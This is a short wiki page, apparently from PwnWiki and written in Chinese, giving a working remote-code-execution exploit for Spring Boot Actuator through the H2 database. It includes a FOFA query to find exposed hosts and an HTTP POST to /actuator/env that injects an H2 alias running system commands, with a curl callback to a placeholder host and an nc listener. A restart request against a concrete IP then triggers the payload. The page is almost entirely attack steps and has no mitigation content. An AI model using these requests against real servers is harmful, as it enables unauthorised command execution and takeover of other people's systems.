Spring Boot Actuator H2 RCE漏洞

From PwnWiki
Revision as of 09:27, 13 June 2021 by Pwnwiki (talk | contribs) (Created page with "==漏洞利用==")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎中文(中国大陆)‎

漏洞影响

Spring Boot < 1.5
Spring Boot >= 1.5

FOFA

body="Whitelabel Error Page"

漏洞利用

访问以下URL: 

http://x.x.x.x:port/actuator

发送如下POST包配置spring.datasource.hikari.connection-test-query的值。 

POST /actuator/env HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/json
Content-Length: 389
{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}'; CALL EXEC('curl x.x.x.x:port');"}

NC监听,向端点 /actuator/restart 发送POST请求, 重启应用。 

POST /actuator/restart HTTP/1.1
Host: 39.105.93.185:8080
Content-Type: application/json
Content-Length: 356
{}
Retrieved from "https://pwnwiki.com/index.php?title=Spring_Boot_Actuator_H2_RCE漏洞/zh-cn&oldid=4950"